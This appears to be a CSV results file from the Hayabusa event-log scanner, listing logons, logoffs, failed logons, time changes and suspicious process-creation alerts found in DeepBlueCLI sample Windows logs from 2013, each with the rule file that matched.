2013-10-24 04:38:41.448 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x24936  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:38:41.448 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x24902,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:39:04.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:39:04.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:42:34.667 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:42:34.667 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:42:34.667 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:42:56.213 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x24936,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:45:27.593 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:45:27.593 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:45:58.015 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:46:01.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:46:10.368 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:46:10.368 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:46:10.368 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:47:07.743 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:47:07.743 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x19489  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:47:07.743 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x194bb  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:47:07.743 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x19489,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:49:30.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:49:30.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:54:00.258 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x194bb,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:54:45.140 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:54:45.140 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:54:58.140 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:55:02.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:55:06.370 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:55:06.370 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:55:06.370 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:55:29.463 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:55:29.463 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x19153  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:55:29.463 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x1917f  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:55:29.463 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x19153,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:57:31.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:57:31.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 05:49:57.323 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x1917f,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 05:53:53.609 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 05:53:53.609 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 05:54:11.078 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 05:54:23.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 05:54:29.619 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 05:54:29.619 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 05:54:29.619 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 05:55:00.775 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 05:55:00.775 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x2b15e  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 05:55:00.775 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x2b18a  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 05:55:00.775 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x2b15e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 05:56:36.634 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 05:56:36.634 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 05:56:36.649 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 05:56:52.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 05:56:52.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 06:05:37.180 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x2b18a,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:07:06.390 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 06:07:06.390 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 06:07:31.859 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:07:35.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 06:07:44.487 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 06:07:44.487 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 06:07:44.487 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:09:53.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 06:09:53.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 06:13:38.283 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:13:38.283 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x25519  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:13:38.283 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x2553c  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:13:38.283 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x25519,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:35:27.013 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 06:35:27.013 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 06:35:27.028 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:50:27.138 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IEUser  :  Target User: rdavis  :  IP Address: -  :  Process:   :  Target Server: cifs/rdavis-7.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:53:45.841 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$  :  Target User: IEUser  :  IP Address: -  :  Process: C:\Windows\System32\svchost.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:53:45.841 +09:00,IE8Win7,4624,informational,Logon Type 4 - Batch,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: -  :  Port: -  :  LogonID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:53:45.841 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:53:45.919 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser  :  LogonID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:53:46.263 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$  :  Target User: IEUser  :  IP Address: -  :  Process: C:\Windows\System32\lsass.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:53:46.263 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: -  :  Port: -  :  LogonID: 0x15f53a  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:53:46.263 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: -  :  Port: -  :  LogonID: 0x15f546  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:53:46.263 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x15f53a,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:53:46.669 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser  :  LogonID: 0x15f546,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:53:46.669 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser  :  LogonID: 0x15f53a,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:54:01.732 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x2553c,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:55:02.343 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 06:55:02.343 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 06:55:25.000 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:55:32.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 06:55:35.625 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:55:35.625 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0xdad4  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:55:35.625 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0xdafc  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:55:35.625 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0xdad4,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:55:37.450 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 06:55:37.450 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 06:55:37.450 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:55:44.840 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$  :  Target User: IEUser  :  IP Address: -  :  Process: C:\Windows\System32\svchost.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:55:44.840 +09:00,IE8Win7,4624,informational,Logon Type 4 - Batch,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: -  :  Port: -  :  LogonID: 0x13dbc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:55:44.840 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x13dbc,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:57:51.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 06:57:51.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 07:00:55.356 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0xdafc,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:00:55.903 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser  :  LogonID: 0xdafc,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:00:55.903 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser  :  LogonID: 0xdad4,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:01:28.840 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:01:28.840 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x4bafc  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:01:28.840 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x4bb14  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:01:28.840 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x4bafc,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:04:16.809 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x4bb14,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:05:00.218 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 07:05:00.218 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 07:05:21.859 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:05:31.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 07:05:32.609 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:05:32.609 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0xd99e  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
